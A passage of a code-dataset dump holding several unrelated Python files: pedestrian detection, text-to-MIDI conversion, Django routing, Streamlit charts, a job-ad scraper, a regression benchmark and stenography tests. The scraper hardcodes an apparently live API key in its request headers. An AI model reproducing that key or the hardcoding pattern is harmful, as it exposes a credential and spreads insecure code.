for y in range(end_point[1])[::48]:\r\n img_window = img_gray[x: x+160, y: y+96]\r\n if img_window.shape != (160, 96):\r\n pass\r\n # print(\"Warning! 
the picture is wrong!\")\r\n window_hog = np.reshape(self.hog.compute(img_window), (1, 7524))\r\n prediction = self.clf.predict(window_hog)\r\n # cv.imshow(\"test\", img_window)\r\n # cv.waitKey()\r\n # print(prediction, end='')\r\n if prediction == 1:\r\n # print(x, y)\r\n cv.rectangle(self.img, (y, x), (y+96, x+160), (0, 255, 0), 2)\r\n # print(\"\\nThe result of PD has been shown.\")\r\n cv.namedWindow('PD result', cv.WINDOW_AUTOSIZE)\r\n cv.imshow(\"PD result\", self.img)\r\n cv.waitKey()\r\n\r\n def def_hog(self):\r\n _feature = 0\r\n # print(\"Initializing HOG descriptor...\")\r\n winsize = (96, 160)\r\n # print(\" window size:\", winsize)\r\n blocksize = (16, 16)\r\n blockstride = (8, 8)\r\n cellsize = (8, 8)\r\n nbins = 9\r\n hog = cv.HOGDescriptor(winsize,\r\n blocksize,\r\n blockstride,\r\n cellsize,\r\n nbins)\r\n return hog\r\n\r\n\r\nstart = time.time()\r\nstep_1 = PedestrianDetection()\r\nstop = time.time()\r\nprint(\"Total time:\", stop - start)\r\n","repo_name":"SaoYear/gender_surveillance","sub_path":"pedestrian_detection/HOG+SVM_demo.py","file_name":"HOG+SVM_demo.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17281537326","text":"#!/usr/bin/python3\n\nimport sys\nfrom pyknon.genmidi import Midi\nfrom pyknon.music import Note, NoteSeq, Rest\nfrom PIL import ImageFont, ImageDraw, Image\n\nfont = ImageFont.truetype(\"/usr/share/fonts/dejavu/DejaVuSans-Oblique.ttf\", 12)\n\nsentence = sys.argv[1]\ninstrument_high = 2\ninstrument_low = 25\n\nimage = Image.new(\"L\", (800,12))\ndraw = ImageDraw.Draw(image)\ndraw.text((0, -1), sentence, font=font, fill=\"white\")\n\nnotes_list_high = []\nnotes_list_low = []\nfor x in range(0,800):\n notes = []\n for y in range(0,12):\n vol = int(image.getpixel((x, y))/2)\n if vol == 127:\n continue\n if vol:\n notes.append(Note(y, 5, 1/16, vol))\n if len(notes):\n seq = NoteSeq(notes)\n notes_list_high.append(NoteSeq(notes[0].harmonize(seq)))\n if len(notes) > 1:\n notes_list_low.append(NoteSeq(notes[len(notes)-1].harmonize(seq)))\n else:\n notes_list_low.append(Rest(1/16))\n else:\n notes_list_high.append(Rest(1/32))\n notes_list_low.append(Rest(1/32))\n\nmidi = Midi(tempo=90, instrument=instrument_high)\nmidi.seq_chords(notes_list_high)\nmidi.write(\"test-high.mid\")\n\nmidi = Midi(tempo=90, instrument=instrument_low)\nmidi.seq_chords(notes_list_low)\nmidi.write(\"test-low.mid\")\n\n","repo_name":"dbordak/txt2noise","sub_path":"txt2noise-single.py","file_name":"txt2noise-single.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"2846082725","text":"\"\"\"backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include\nfrom rest_framework.documentation import include_docs_urls\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import LoginViewset, SignupViewSet, ProfileViewset, UsersViewset\nfrom videos.views import VideoViewset, FeedViewset, VideoRecommendedViewset\nfrom operations.views import CommentsViewset, VideoDislikeViewset, VideoLikeViewset, SubscriptionViewset, VideosLikedViewset, ViewsViewset, VideosViewedViewset, ChannelRecommendedViewset\n\nrouter = DefaultRouter()\n\nrouter.register(r'signup', SignupViewSet, basename = 'signup')\nrouter.register(r'profile', ProfileViewset, basename='profile')\nrouter.register(r'videos', VideoViewset, basename='videos')\nrouter.register(r'users', UsersViewset, basename = 'users')\nrouter.register(r'comments', CommentsViewset, basename = 'comments')\nrouter.register(r'videolike', VideoLikeViewset, basename = 'videolike')\nrouter.register(r'videodislike', VideoDislikeViewset, basename='videodislike')\nrouter.register(r'channel', SubscriptionViewset, basename = 'channel')\nrouter.register(r'videosliked', VideosLikedViewset, basename='videosliked')\nrouter.register(r'view', ViewsViewset, basename = 'view')\nrouter.register(r'videosViewed', VideosViewedViewset, basename='videosViewed')\nrouter.register(r'feed', FeedViewset, basename = 'feed')\nrouter.register(r'videoRecommended', VideoRecommendedViewset, basename='videoRecommended')\nrouter.register(r'channelRecommended', ChannelRecommendedViewset, basename = 'channelRecommended')\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^', include(router.urls)),\n url(r'docs/', include_docs_urls(title=\"Backend\")),\n path('login/', LoginViewset.as_view(), name='token_obtain_pair'),\n]\n","repo_name":"jesse-zwd/itube-backend","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71705793080","text":"from typing import Any, Dict\n\nimport plotly.graph_objects as go\nimport streamlit as st\nfrom streamlit_prophet.lib.exposition.preparation import get_cv_dates_dict, get_hover_template_cv\n\n\ndef plot_cv_dates(\n cv_dates: Dict[Any, Any], resampling: Dict[Any, Any], style: Dict[Any, Any]\n) -> go.Figure:\n \"\"\"Creates a plotly bar plot showing training and validation dates for each cross-validation fold.\n\n Parameters\n ----------\n cv_dates : Dict\n Dictionary containing training and validation dates of each cross-validation fold.\n resampling : Dict\n Resampling specifications (granularity, dataset frequency).\n style : Dict\n Style specifications for the graph (colors).\n\n Returns\n -------\n go.Figure\n Plotly bar plot showing training and validation dates for each cross-validation fold.\n \"\"\"\n hover_data, hover_template = get_hover_template_cv(cv_dates, resampling)\n fig = go.Figure()\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n x=[cv_dates[fold][\"val_end\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][1], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n 
x=[cv_dates[fold][\"train_start\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][0], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.add_trace(\n go.Bar(\n y=list(cv_dates.keys()),\n x=[cv_dates[fold][\"train_end\"] for fold in cv_dates.keys()],\n name=\"\",\n orientation=\"h\",\n text=hover_data,\n hoverinfo=\"y+text\",\n hovertemplate=hover_template,\n marker=dict(color=style[\"colors\"][0], line=dict(color=style[\"colors\"][1], width=2)),\n )\n )\n fig.update_layout(\n showlegend=False,\n barmode=\"overlay\",\n xaxis_type=\"date\",\n title_text=\"Cross-Validation Folds\",\n title_x=0.5,\n title_y=0.85,\n )\n return fig\n\n\ndef display_expander(\n readme: Dict[Any, Any], section: str, title: str, add_blank: bool = False\n) -> None:\n \"\"\"Displays a streamlit expander with information about a section of the dashboard.\n\n Parameters\n ----------\n readme : Dict\n Dictionary containing explanations about the section.\n section : str\n Section of the dashboard on top of which the expander will be displayed.\n title : str\n Title for the expander.\n add_blank : bool\n Whether or not to add a blank after the expander.\n \"\"\"\n with st.expander(title, expanded=False):\n st.write(readme[\"plots\"][section])\n st.write(\"\")\n if add_blank:\n st.write(\"\")\n st.write(\"\")\n\n\ndef display_expanders_performance(\n use_cv: bool,\n dates: Dict[Any, Any],\n resampling: Dict[Any, Any],\n style: Dict[Any, Any],\n readme: Dict[Any, Any],\n) -> None:\n \"\"\"Displays a streamlit expander with information about performance section.\n\n Parameters\n ----------\n use_cv : bool\n Whether or not cross-validation is used.\n dates : Dict\n Dictionary containing cross-validation dates information.\n resampling : Dict\n Resampling specifications (granularity, dataset frequency).\n style : Dict\n Style specifications for the graph (colors).\n readme : Dict\n Dictionary containing explanations about the section.\n \"\"\"\n st.write(\"\")\n with st.expander(\"More info on evaluation metrics\", expanded=False):\n st.write(readme[\"plots\"][\"metrics\"])\n st.write(\"\")\n _display_metrics()\n st.write(\"\")\n if use_cv:\n cv_dates = get_cv_dates_dict(dates, resampling)\n with st.expander(\"See cross-validation folds\", expanded=False):\n st.plotly_chart(plot_cv_dates(cv_dates, resampling, style))\n\n\ndef _display_metrics() -> None:\n \"\"\"Displays formulas for all performance metrics.\"\"\"\n if st.checkbox(\"Show metric formulas\", value=False):\n st.write(\"If N is the number of distinct dates in the evaluation set:\")\n st.latex(r\"MAPE = \\dfrac{1}{N}\\sum_{t=1}^{N}|\\dfrac{Truth_t - Forecast_t}{Truth_t}|\")\n st.latex(r\"RMSE = \\sqrt{\\dfrac{1}{N}\\sum_{t=1}^{N}(Truth_t - Forecast_t)^2}\")\n st.latex(\n r\"SMAPE = \\dfrac{1}{N}\\sum_{t=1}^{N}\\dfrac{2|Truth_t - Forecast_t]}{|Truth_t| + |Forecast_t|}\"\n )\n st.latex(r\"MSE = \\dfrac{1}{N}\\sum_{t=1}^{N}(Truth_t - Forecast_t)^2\")\n st.latex(r\"MAE = \\dfrac{1}{N}\\sum_{t=1}^{N}|Truth_t - Forecast_t|\")\n","repo_name":"artefactory/streamlit_prophet","sub_path":"streamlit_prophet/lib/exposition/expanders.py","file_name":"expanders.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"40"} +{"seq_id":"7742775873","text":"import json, os, sys, operator\nfrom pip._vendor import requests\nfrom slugify import Slugify\n\nproj = 
os.path.dirname(os.path.abspath('manage.py'))\nsys.path.append(proj)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'Hela_robot.settings'\n\nimport django\n\ndjango.setup()\n\nfrom plats_bank.models import City, Job_type, Job_ad\n\napi_key = \"YicmXHhlMFx4ZGRceDgxXHg4ZVx4ZDZpXHhjMlx4YjFceGYwXHgxZS5ceGFhXHhjNFx4OGVqXV1ceGFmXHg5OCc\"\ncity_list_url = \"https://taxonomy.api.jobtechdev.se/v1/taxonomy/specific/concepts/municipality?include-legacy-information=true&include-deprecated=false&deprecated=false\"\njobb_type_list_url = \"https://taxonomy.api.jobtechdev.se/v1/taxonomy/specific/concepts/ssyk?include-legacy-information=false&include-deprecated=false&deprecated=false&relation=related\"\njob_ads_url = \"https://jobsearch.api.jobtechdev.se/search?\"\nheaders = {'api-key': api_key, 'accept': 'application/json', 'x-feature-disable-smart-freetext': 'false',\n 'x-feature-enable-false-negative': 'false'\n }\n\n\ndef test_search_loop_through_hits():\n response = requests.get(city_list_url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n hits = json_response\n for hit in hits:\n try:\n city_name = hit['taxonomy/definition']\n lau_2_code_2015 = hit['taxonomy/lau-2-code-2015']\n City(name=city_name, lau_2_code_2015=lau_2_code_2015).save()\n except django.db.utils.IntegrityError:\n print(\"City allready exsist\")\n\n\ndef jobb_type_list_maker():\n response = requests.get(jobb_type_list_url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n hits = json_response\n for hit in hits:\n # print(hit)\n definition = hit['taxonomy/definition']\n af_id = hit['taxonomy/id']\n name = hit['taxonomy/preferred-label']\n ssyk_code_2012 = hit['taxonomy/ssyk-code-2012']\n print(name + '->' + af_id)\n try:\n Job_type(definition=definition, name=name, ssyk_code_2012=ssyk_code_2012, af_id=af_id).save()\n except django.db.utils.IntegrityError:\n print(\"Jobb type allready exsist\")\n\n\ndef job_ads_url_maker(lau_2_code_2015, af_id):\n job_ads_url = 'https://jobsearch.api.jobtechdev.se/search?'\n q = 'occupation-group=' + af_id + '&municipality=' + lau_2_code_2015 + '&offset=0&limit=100'\n return job_ads_url + q\n\n\ndef job_ad_finder():\n # citys = City.objects.all()\n citys = ['1480']\n for city_obj in citys:\n job_types = Job_type.objects.all()\n for job_type in job_types:\n job_type_code = str(job_type.af_id)\n # url = job_ads_url_maker(str(city_obj.lau_2_code_2015), job_type_code)\n url = job_ads_url_maker(str(city_obj), job_type_code)\n response = requests.get(url, headers=headers)\n response.raise_for_status() # check for http errors\n json_response = json.loads(response.content.decode('utf8'))\n if json_response['total']['value'] > 0:\n # print(json_response['total']['value'])#print total\n # print(json_response['hits'])\n for hit in json_response['hits']:\n if hit['application_details']['url'] != None:\n # print(hit['application_details']['url'])#print anons url\n url = hit['application_details']['url']\n id = hit['id']\n title = hit['headline']\n description = hit['description']['text']\n company = hit['employer']['name']\n # city = City.objects.get(lau_2_code_2015=str(city_obj.lau_2_code_2015))\n city = City.objects.get(lau_2_code_2015=str(city_obj))\n job_type = (Job_type.objects.get(af_id=job_type_code))\n application_deadline = hit['application_deadline']\n try:\n print(title + \"==>\" + str(city))\n Job_ad(af_id=id,\n 
application_deadline=application_deadline,\n title=title,\n description=description,\n city=city,\n company=company,\n ad_url=url,\n job_type=job_type).save()\n except django.db.utils.IntegrityError:\n print(\"Annos allready added\")\n\n\ntest_search_loop_through_hits()\njobb_type_list_maker()\njob_ad_finder()\n","repo_name":"fdeh75/Hela_robot","sub_path":"create_new_db/create_new_db.py","file_name":"create_new_db.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31314909712","text":"import StackGP as sgp\nimport numpy as np\nimport time\n\n#Performance Test\ndef test(func, dimensions, ranges, numberOfPoints=100, numberOfTestsPoints=200):\n inputData=[]\n testInput=[]\n for i in range(dimensions):\n inputData.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfPoints))\n testInput.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfTestsPoints))\n inputData=np.array(inputData)\n testInput=np.array(testInput)\n response=func(inputData)\n testResponse=func(testInput)\n errors=[]\n models=[]\n minerr=1\n models1=sgp.evolve(inputData,response,initialPop=models,generations=1000,tracking=False,popSize=300,ops=sgp.allOps(),timeLimit=120,capTime=True,align=False,elitismRate=10)\n models2=sgp.evolve(inputData,response,initialPop=models,generations=1000,tracking=False,popSize=300,ops=sgp.allOps(),timeLimit=120,capTime=True,align=False,elitismRate=10)\n models=models1+models2\n models=sgp.selectModels(models,20)\n alignedModels=[sgp.alignGPModel(mods,inputData,response) for mods in models]\n fitList=np.array([sgp.fitness(mod,testInput,testResponse) for mod in alignedModels])\n minerr=min(fitList[np.logical_not(np.isnan(fitList))])\n return minerr, fitList\n\n#Speed Test\ndef speedTest(func, dimensions, ranges, numberOfPoints=100, numberOfTestsPoints=200):\n inputData=[]\n testInput=[]\n for i in range(dimensions):\n inputData.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfPoints))\n testInput.append(np.random.uniform(ranges[i][0],ranges[i][1],numberOfTestsPoints))\n inputData=np.array(inputData)\n testInput=np.array(testInput)\n response=func(inputData)\n testResponse=func(testInput)\n #Record start time\n start=time.time()\n models=sgp.evolve(inputData,response,generations=1000,popSize=300,ops=sgp.allOps(),capTime=False,align=True,elitismRate=10)\n #Record end time\n end=time.time()\n #Return time taken\n return end-start\n\ndef batches(func, dimensions, ranges, numberOfPoints=100, numberOfTestPoints=200, repeats=10):\n errs=[]\n for i in range(repeats):\n err,fit=test(func,dimensions,ranges,numberOfPoints,numberOfTestPoints)\n errs.append(err)\n return min(errs), np.median(errs), np.mean(errs), max(errs), np.std(errs)\n\ndef speedBatch(func,dimension,ranges,numberOfPoints=100,numberOfTestPoints=200,repeats=10):\n times=[]\n for i in range(repeats):\n times.append(speedTest(func,dimension,ranges,numberOfPoints,numberOfTestPoints))\n return min(times), np.median(times), np.mean(times), max(times), np.std(times)\n\n\nminerrs=[]\nmederrs=[]\nmeanerrs=[]\nmaxerrs=[]\nstd=[]\nfits=[]\n\n#Feynman EQ2\nf1=lambda data: (np.exp((-((data[0])/data[1])**2)/2)/(np.sqrt(2*np.pi)*data[1]))\nerr=batches(f1,2,[[1,3],[1,3]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ2\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ3\nf2=lambda data: 
(np.exp((-((data[0]-data[1])/data[2])**2)/2)/(np.sqrt(2*np.pi)*data[2]))\nerr=batches(f2,3,[[1,3],[1,3],[1,3]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ3\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ4\nf3=lambda data: (np.sqrt((data[1]-data[2])**2+(data[3]-data[2])**2))\nerr=batches(f3,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ4\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ91\nf4=lambda data: (data[0]*np.sqrt(data[1]**2+data[2]**2+data[3]**2))\nerr=batches(f4,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ91\")\nprint(\"Error: \"+str(err))\n\n#Feynman EQ27\nf5=lambda data: (1/(1/data[0]+data[1]/data[2]))\nerr=batches(f5,3,[[1,5],[1,5],[1,5]],100,200)\nminerrs.append(err[0])\nmederrs.append(err[1])\nmeanerrs.append(err[2])\nmaxerrs.append(err[3])\nstd.append(err[4])\nprint(\"Feynman EQ27\")\nprint(\"Error: \"+str(err))\n\n#Speed Test\nprint(\"Speed Test\")\nprint(\"Feynman EQ91\")\nspeed=speedBatch(f4,4,[[1,5],[1,5],[1,5],[1,5]],100,200)\nprint(\"Time: \"+str(speed))\n\n\nfile=open(\"BenchmarkResults.txt\",\"w+\")\nfile.write(\"Feynman EQ2\\n\")\nfile.write(\"Min Error: \"+str(minerrs[0])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[0])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[0])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[0])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[0])+\"\\n\")\nfile.write(\"Feynman EQ3\\n\")\nfile.write(\"Min Error: \"+str(minerrs[1])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[1])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[1])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[1])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[1])+\"\\n\")\nfile.write(\"Feynman EQ4\\n\")\nfile.write(\"Min Error: \"+str(minerrs[2])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[2])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[2])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[2])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[2])+\"\\n\")\nfile.write(\"Feynman EQ91\\n\")\nfile.write(\"Min Error: \"+str(minerrs[3])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[3])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[3])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[3])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[3])+\"\\n\")\nfile.write(\"Feynman EQ27\\n\")\nfile.write(\"Min Error: \"+str(minerrs[4])+\"\\n\")\nfile.write(\"Median Error: \"+str(mederrs[4])+\"\\n\")\nfile.write(\"Mean Error: \"+str(meanerrs[4])+\"\\n\")\nfile.write(\"Max Error: \"+str(maxerrs[4])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(std[4])+\"\\n\")\nfile.write(\"Speed Test\\n\")\nfile.write(\"Min Time: \"+str(speed[0])+\"\\n\")\nfile.write(\"Median Time: \"+str(speed[1])+\"\\n\")\nfile.write(\"Mean Time: \"+str(speed[2])+\"\\n\")\nfile.write(\"Max Time: \"+str(speed[3])+\"\\n\")\nfile.write(\"Standard Deviation: \"+str(speed[4])+\"\\n\")\nfile.close()\n\n\n\n\n","repo_name":"hoolagans/StackGP","sub_path":"Benchmark.py","file_name":"Benchmark.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31633408250","text":"import unittest\nfrom ensure import 
ensure\nfrom stroke_dictionary_creator.generators.generators import *\nimport itertools\nimport stroke_dictionary_creator.stroke_parser as stroke_parser\n\nclass TestGenerators(unittest.TestCase):\n def test_middle_vowel(self):\n ensure(middle_vowel.parse(\"a\")).equals(\"A\")\n ensure(middle_vowel.parse(\"e\")).equals(\"E\")\n ensure(middle_vowel.parse(\"i\")).equals(\"I\")\n ensure(middle_vowel.parse(\"o\")).equals(\"O\")\n ensure(middle_vowel.parse(\"u\")).equals(\"AO\")\n ensure(middle_vowel.parse(\"y\")).equals(\"AO\")\n ensure(middle_vowel.parse(\"ä\")).equals(\"A\")\n ensure(middle_vowel.parse(\"ö\")).equals(\"O\")\n\n def test_end_vowel(self):\n ensure(end_vowel.parse(\"e\")).equals(\"e\")\n ensure(end_vowel.parse(\"o\")).equals(\"o\")\n ensure(end_vowel.parse(\"ö\")).equals(\"o\")\n ensure(end_vowel.parse(\"i\")).equals(\"i\")\n ensure(end_vowel.parse(\"u\")).equals(\"eo\")\n ensure(end_vowel.parse(\"y\")).equals(\"eo\")\n\n ensure(end_vowel.parse(\"a\")).equals(\"\")\n ensure(end_vowel.parse(\"ä\")).equals(\"\")\n\n def test_initial_consonant(self):\n ensure(initial_consonant.parse(\"g\")).equals(\"TKPV\")\n ensure(initial_consonant.parse(\"j\")).equals(\"SKVR\")\n ensure(initial_consonant.parse(\"d\")).equals(\"TK\")\n ensure(initial_consonant.parse(\"b\")).equals(\"PV\")\n ensure(initial_consonant.parse(\"q\")).equals(\"KV\")\n ensure(initial_consonant.parse(\"m\")).equals(\"PH\")\n ensure(initial_consonant.parse(\"y\")).equals(\"KVR\")\n ensure(initial_consonant.parse(\"y\")).equals(\"KVR\")\n ensure(initial_consonant.parse(\"l\")).equals(\"HR\")\n\n ensure(initial_consonant.parse(\"s\")).equals(\"S\")\n ensure(initial_consonant.parse(\"t\")).equals(\"T\")\n ensure(initial_consonant.parse(\"k\")).equals(\"K\")\n ensure(initial_consonant.parse(\"p\")).equals(\"P\")\n ensure(initial_consonant.parse(\"v\")).equals(\"V\")\n ensure(initial_consonant.parse(\"h\")).equals(\"H\")\n ensure(initial_consonant.parse(\"r\")).equals(\"R\")\n\n def test_middle_diphtong(self):\n ensure(middle_diphtong.parse(\"ae\")).equals(\"AE\")\n ensure(middle_diphtong.parse(\"äe\")).equals(\"AE\")\n ensure(middle_diphtong.parse(\"ai\")).equals(\"AI\")\n ensure(middle_diphtong.parse(\"äi\")).equals(\"AI\")\n ensure(middle_diphtong.parse(\"ue\")).equals(\"AOE\")\n ensure(middle_diphtong.parse(\"ye\")).equals(\"AOE\")\n ensure(middle_diphtong.parse(\"ui\")).equals(\"AOI\")\n ensure(middle_diphtong.parse(\"yi\")).equals(\"AOI\")\n ensure(middle_diphtong.parse(\"ei\")).equals(\"EI\")\n\n ensure(middle_diphtong.parse(\"ea\")).equals(\"A*E\")\n ensure(middle_diphtong.parse(\"eä\")).equals(\"A*E\")\n\n ensure(middle_diphtong.parse(\"ia\")).equals(\"A*I\")\n ensure(middle_diphtong.parse(\"iä\")).equals(\"A*I\")\n\n ensure(middle_diphtong.parse(\"eu\")).equals(\"AO*E\")\n ensure(middle_diphtong.parse(\"ey\")).equals(\"AO*E\")\n\n ensure(middle_diphtong.parse(\"iu\")).equals(\"AO*I\")\n ensure(middle_diphtong.parse(\"iy\")).equals(\"AO*I\")\n\n ensure(middle_diphtong.parse(\"ie\")).equals(\"*EI\")\n\n def test_end_diphtong(self):\n ensure(end_diphtong.parse(\"ei\")).equals(\"ei\")\n ensure(end_diphtong.parse(\"eo\")).equals(\"eo\")\n ensure(end_diphtong.parse(\"eö\")).equals(\"eo\")\n ensure(end_diphtong.parse(\"ea\")).equals(\"ea\")\n ensure(end_diphtong.parse(\"eä\")).equals(\"ea\")\n ensure(end_diphtong.parse(\"ui\")).equals(\"eoi\")\n ensure(end_diphtong.parse(\"yi\")).equals(\"eoi\")\n ensure(end_diphtong.parse(\"ua\")).equals(\"eoa\")\n ensure(end_diphtong.parse(\"yä\")).equals(\"eoa\")\n 
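# editor's note: front/back vowel pairs (ä/a, ö/o, y/u) collapse onto the same chord, which is why each pair of assertions here expects identical output\n        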
ensure(end_diphtong.parse(\"oi\")).equals(\"oi\")\n ensure(end_diphtong.parse(\"öi\")).equals(\"oi\")\n ensure(end_diphtong.parse(\"oa\")).equals(\"oa\")\n ensure(end_diphtong.parse(\"öä\")).equals(\"oa\")\n\n # This is an exception to the rule.\n # The intention is to write words like \"kulkija\" (traveller) with a\n # single stroke.\n ensure(end_diphtong.parse(\"ja\")).equals(\"ia\")\n ensure(end_diphtong.parse(\"jä\")).equals(\"ia\")\n\n def test_end_triphtong(self):\n ensure(end_triphtong.parse(\"ija\")).equals(\"eia\")\n ensure(end_triphtong.parse(\"ijä\")).equals(\"eia\")\n ensure(end_triphtong.parse(\"uja\")).equals(\"eoia\")\n ensure(end_triphtong.parse(\"yjä\")).equals(\"eoia\")\n ensure(end_triphtong.parse(\"oja\")).equals(\"oia\")\n ensure(end_triphtong.parse(\"öjä\")).equals(\"oia\")\n\n def test_final_consonant(self):\n ensure(final_consonant.parse(\"l\")).equals(\"NST\")\n ensure(final_consonant.parse(\"m\")).equals(\"SH\")\n ensure(final_consonant.parse(\"p\")).equals(\"HR\")\n ensure(final_consonant.parse(\"v\")).equals(\"SR\")\n\n ensure(final_consonant.parse(\"n\")).equals(\"N\")\n ensure(final_consonant.parse(\"k\")).equals(\"K\")\n ensure(final_consonant.parse(\"s\")).equals(\"S\")\n ensure(final_consonant.parse(\"h\")).equals(\"H\")\n ensure(final_consonant.parse(\"t\")).equals(\"T\")\n ensure(final_consonant.parse(\"r\")).equals(\"R\")\n\n def test_long_vowel(self):\n ensure(long_vowel.parse(\"aa\")).equals(\"A*\")\n ensure(long_vowel.parse(\"ää\")).equals(\"A*\")\n ensure(long_vowel.parse(\"uu\")).equals(\"AO*\")\n ensure(long_vowel.parse(\"yy\")).equals(\"AO*\")\n ensure(long_vowel.parse(\"oo\")).equals(\"O*\")\n ensure(long_vowel.parse(\"öö\")).equals(\"O*\")\n ensure(long_vowel.parse(\"ee\")).equals(\"*E\")\n ensure(long_vowel.parse(\"ii\")).equals(\"*I\")\n\n def test_final_two_consonants(self):\n # try all combinations of 2 final consonants, and see that the stroke\n # parser is able to parse all combinations that final_two_consonants\n # reports as valid. 
stroke_parser is thus the reference implementation\n # that is presumed correct.\n consonants = \"NKSHTR\"\n combinations = self.key_combinations(consonants)\n\n for comb in combinations:\n stroke_parser_result = self.parse_or_none(stroke_parser.end_keys, comb)\n final_two_consonants_result = self.parse_or_none(final_two_consonants,\n comb.lower())\n\n ensure(stroke_parser_result).equals(final_two_consonants_result)\n\n def key_combinations(self, keys):\n combinations = itertools.combinations(keys, 2)\n return list(map(lambda c: \"\".join(c), combinations))\n\n def parse_or_none(self, p, input_string):\n try:\n return p.parse(input_string)\n except Exception as e:\n return None\n\n def test_final_double_consonant(self):\n ensure(final_double_consonant.parse(\"nn\")).equals(\"NKS\")\n ensure(final_double_consonant.parse(\"kk\")).equals(\"NKH\")\n ensure(final_double_consonant.parse(\"mm\")).equals(\"KSH\")\n ensure(final_double_consonant.parse(\"ss\")).equals(\"NSH\")\n ensure(final_double_consonant.parse(\"rr\")).equals(\"HTR\")\n ensure(final_double_consonant.parse(\"pp\")).equals(\"SHR\")\n ensure(final_double_consonant.parse(\"tt\")).equals(\"STR\")\n\n def end_vocal_sound(self):\n ensure(end_vocal_sound.parse(\"a\")).equals(\"\")\n ensure(end_vocal_sound.parse(\"ä\")).equals(\"\")\n ensure(end_vocal_sound.parse(\"ei\")).equals(\"ei\")\n ensure(end_vocal_sound.parse(\"ijä\")).equals(\"eia\")\n ensure(end_vocal_sound.parse(\"iä\")).equals(\"ia\")\n ensure(end_vocal_sound.parse(\"ia\")).equals(\"ia\")\n","repo_name":"sp3ctum/plover-finnish","sub_path":"stroke_dictionary_creator/stroke_dictionary_creator/generators/test_generators.py","file_name":"test_generators.py","file_ext":"py","file_size_in_byte":7530,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20394612455","text":"from django.urls import path\nfrom . 
